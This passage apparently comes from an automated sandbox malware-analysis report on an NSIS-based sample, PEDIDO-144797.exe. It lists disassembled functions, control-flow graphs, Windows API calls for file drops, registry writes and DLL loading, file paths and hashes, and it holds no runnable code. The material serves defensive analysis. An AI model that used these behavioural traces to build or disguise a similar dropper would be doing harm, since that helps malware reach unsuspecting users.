                                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                          • API String ID: 717251189-1230650788
                                                                                                                                          • Opcode ID: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                                                                                          • Instruction ID: 781aa6555cb08bc9a39a1310e2b7c8a7a94b670d8f790df7948cd7d686d0a9f3
                                                                                                                                          • Opcode Fuzzy Hash: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                                                                                          • Instruction Fuzzy Hash: 52611771600101ABDF209F54ED40ABE37A5AF40314F56453FE947B62D4D73D8AA2CB5D
                                                                                                                                          Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 611 40176f-401794 call 402c37 call 405cf8 616 401796-40179c call 4063b0 611->616 617 40179e-4017b0 call 4063b0 call 405c81 lstrcatW 611->617 622 4017b5-4017b6 call 406644 616->622 617->622 626 4017bb-4017bf 622->626 627 4017c1-4017cb call 4066f3 626->627 628 4017f2-4017f5 626->628 636 4017dd-4017ef 627->636 637 4017cd-4017db CompareFileTime 627->637 630 4017f7-4017f8 call 405e7d 628->630 631 4017fd-401819 call 405ea2 628->631 630->631 638 40181b-40181e 631->638 639 40188d-4018b6 call 405414 call 4031ba 631->639 636->628 637->636 640 401820-40185e call 4063b0 * 2 call 4063d2 call 4063b0 call 405a12 638->640 641 40186f-401879 call 405414 638->641 653 4018b8-4018bc 639->653 654 4018be-4018ca SetFileTime 639->654 640->626 673 401864-401865 640->673 651 401882-401888 641->651 655 402ac8 651->655 653->654 657 4018d0-4018db CloseHandle 653->657 654->657 661 402aca-402ace 655->661 658 4018e1-4018e4 657->658 659 402abf-402ac2 657->659 662 4018e6-4018f7 call 4063d2 lstrcatW 658->662 663 4018f9-4018fc call 4063d2 658->663 659->655 669 401901-4022f6 call 405a12 662->669 663->669 669->661 673->651 675 401867-401868 673->675 675->641
                                                                                                                                          APIs
                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi,?,?,00000031), ref: 004017B0
                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi,?,?,00000031), ref: 004017D5
                                                                                                                                            • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp$C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\sludrehovedet\mississippi$Call
                                                                                                                                          • API String ID: 1941528284-2260999969
                                                                                                                                          • Opcode ID: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                                                                                                          • Instruction ID: 6d789f9af123ab0f865e5502c846d56d3cd3544f1fa5f1ae7e054fd30d3333f6
                                                                                                                                          • Opcode Fuzzy Hash: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                                                                                                          • Instruction Fuzzy Hash: E741D871510115BACF117BA5CD45EAF3679EF01328B20423FF922F10E1DB3C8A519AAE
                                                                                                                                          Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 677 402644-40265d call 402c15 680 402663-40266a 677->680 681 402abf-402ac2 677->681 682 40266c 680->682 683 40266f-402672 680->683 684 402ac8-402ace 681->684 682->683 685 4027d6-4027de 683->685 686 402678-402687 call 406310 683->686 685->681 686->685 690 40268d 686->690 691 402693-402697 690->691 692 40272c-40272f 691->692 693 40269d-4026b8 ReadFile 691->693 694 402731-402734 692->694 695 402747-402757 call 405f25 692->695 693->685 696 4026be-4026c3 693->696 694->695 697 402736-402741 call 405f83 694->697 695->685 706 402759 695->706 696->685 699 4026c9-4026d7 696->699 697->685 697->695 702 402792-40279e call 4062f7 699->702 703 4026dd-4026ef MultiByteToWideChar 699->703 702->684 703->706 707 4026f1-4026f4 703->707 709 40275c-40275f 706->709 710 4026f6-402701 707->710 709->702 711 402761-402766 709->711 710->709 712 402703-402728 SetFilePointer MultiByteToWideChar 710->712 713 4027a3-4027a7 711->713 714 402768-40276d 711->714 712->710 715 40272a 712->715 716 4027c4-4027d0 SetFilePointer 713->716 717 4027a9-4027ad 713->717 714->713 718 40276f-402782 714->718 715->706 716->685 719 4027b5-4027c2 717->719 720 4027af-4027b3 717->720 718->685 721 402784-40278a 718->721 719->685 720->716 720->719 721->691 722 402790 721->722 722->685
                                                                                                                                          APIs
                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                                                                                            • Part of subcall function 00405F83: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405F99
                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                          • String ID: 9
                                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                                          • Opcode ID: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                                                                                          • Instruction ID: c360ee4afea2d2749c5a2d2d3cba589ababf6fe072d155cbc4f623872b1d9462
                                                                                                                                          • Opcode Fuzzy Hash: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                                                                                          • Instruction Fuzzy Hash: 2E51F874D0021AAADF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                                                                                                          Function 0040671A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 723 40671a-40673a GetSystemDirectoryW 724 40673c 723->724 725 40673e-406740 723->725 724->725 726 406751-406753 725->726 727 406742-40674b 725->727 729 406754-406787 wsprintfW LoadLibraryExW 726->729 727->726 728 40674d-40674f 727->728 728->729
                                                                                                                                          APIs
                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                                                                                          • wsprintfW.USER32 ref: 0040676C
                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                                          • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                          • Instruction ID: 212fe184e71725d5a8014c1118872f5233ada1a9ecb6260670121aae60094f83
                                                                                                                                          • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                                          • Instruction Fuzzy Hash: BBF02170510119ABCF10BB64DD0DF9B375CAB00305F50447AA546F20D1EBBCDA78C798
                                                                                                                                          Function 004058E3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 730 4058e3-40592e CreateDirectoryW 731 405930-405932 730->731 732 405934-405941 GetLastError 730->732 733 40595b-40595d 731->733 732->733 734 405943-405957 SetFileSecurityW 732->734 734->731 735 405959 GetLastError 734->735 735->733
                                                                                                                                          APIs
                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                                                                                                          • GetLastError.KERNEL32 ref: 0040593A
                                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040594F
                                                                                                                                          • GetLastError.KERNEL32 ref: 00405959
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                          • API String ID: 3449924974-3370423016
                                                                                                                                          • Opcode ID: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                                                                          • Instruction ID: c49c088e9ba2396d105a9c54abfe353073567d613583196498a7e7de041cdc41
                                                                                                                                          • Opcode Fuzzy Hash: 4e538d1c76d2fdfb7cd0fd00a6572ed9e7029d57e55293966324597acc96cb40
                                                                                                                                          • Instruction Fuzzy Hash: C8011AB1C10619DADF009FA1C9487EFBFB4EF14354F00403AD545B6291D7789618CFA9
                                                                                                                                          Function 00405ED1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 736 405ed1-405edd 737 405ede-405f12 GetTickCount GetTempFileNameW 736->737 738 405f21-405f23 737->738 739 405f14-405f16 737->739 741 405f1b-405f1e 738->741 739->737 740 405f18 739->740 740->741
                                                                                                                                          APIs
                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405EEF
                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\PEDIDO-144797.exe",00403487,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77763420,004036D5), ref: 00405F0A
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PEDIDO-144797.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                          • API String ID: 1716503409-639685201
                                                                                                                                          • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                          • Instruction ID: 6418149b7de8853f47a359c443b4445f7a51012143164c36937b703eba88611a
                                                                                                                                          • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                                          • Instruction Fuzzy Hash: 51F03076A00204FBEB009F59ED05E9BB7ACEB95750F10803AED41F7250E6B49A54CB69
                                                                                                                                          Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 742 10001759-10001795 call 10001b18 746 100018a6-100018a8 742->746 747 1000179b-1000179f 742->747 748 100017a1-100017a7 call 10002286 747->748 749 100017a8-100017b5 call 100022d0 747->749 748->749 754 100017e5-100017ec 749->754 755 100017b7-100017bc 749->755 756 1000180c-10001810 754->756 757 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 754->757 758 100017d7-100017da 755->758 759 100017be-100017bf 755->759 763 10001812-1000184c call 100015b4 call 100024a4 756->763 764 1000184e-10001854 call 100024a4 756->764 780 10001855-10001859 757->780 758->754 765 100017dc-100017dd call 10002b57 758->765 761 100017c1-100017c2 759->761 762 100017c7-100017c8 call 1000289c 759->762 769 100017c4-100017c5 761->769 770 100017cf-100017d5 call 10002640 761->770 776 100017cd 762->776 763->780 764->780 773 100017e2 765->773 769->754 769->762 779 100017e4 770->779 773->779 776->773 779->754 785 10001896-1000189d 780->785 786 1000185b-10001869 call 10002467 780->786 785->746 788 1000189f-100018a0 GlobalFree 785->788 792 10001881-10001888 786->792 793 1000186b-1000186e 786->793 788->746 792->785 795 1000188a-10001895 call 1000153d 792->795 793->792 794 10001870-10001878 793->794 794->792 796 1000187a-1000187b FreeLibrary 794->796 795->785 796->792
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                                                                                            • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                                                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1791698881-3916222277
                                                                                                                                          • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                                                                                          • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                                                                                                          • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                                                                                                          • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                                                                                                          Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 799 4023de-40240f call 402c37 * 2 call 402cc7 806 402415-40241f 799->806 807 402abf-402ace 799->807 809 402421-40242e call 402c37 lstrlenW 806->809 810 402432-402435 806->810 809->810 811 402437-402448 call 402c15 810->811 812 402449-40244c 810->812 811->812 816 40245d-402471 RegSetValueExW 812->816 817 40244e-402458 call 4031ba 812->817 821 402473 816->821 822 402476-402557 RegCloseKey 816->822 817->816 821->822 822->807 824 402885-40288c 822->824 824->807
                                                                                                                                          APIs
                                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,00000023,00000011,00000002), ref: 00402429
                                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,00000000,00000011,00000002), ref: 00402469
                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseValuelstrlen
                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp
                                                                                                                                          • API String ID: 2655323295-606440572
                                                                                                                                          • Opcode ID: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
                                                                                                                                          • Instruction ID: 1eab41df84c6b24c6b923ea001d17cdc0cfdc7d4c8a499a75fdfc4da8179f3fa
                                                                                                                                          • Opcode Fuzzy Hash: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
                                                                                                                                          • Instruction Fuzzy Hash: A1118171E00108AFEB10AFA5DE49EAEBAB4EB54354F11803AF504F71D1DBB84D459B58
                                                                                                                                          Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 825 402d2a-402d53 call 40621d 827 402d58-402d5a 825->827 828 402dd0-402dd4 827->828 829 402d5c-402d62 827->829 830 402d7e-402d93 RegEnumKeyW 829->830 831 402d64-402d66 830->831 832 402d95-402da7 RegCloseKey call 40678a 830->832 834 402db6-402dc2 RegCloseKey 831->834 835 402d68-402d7c call 402d2a 831->835 839 402dc4-402dca RegDeleteKeyW 832->839 840 402da9-402db4 832->840 834->828 835->830 835->832 839->828 840->828
                                                                                                                                          APIs
                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
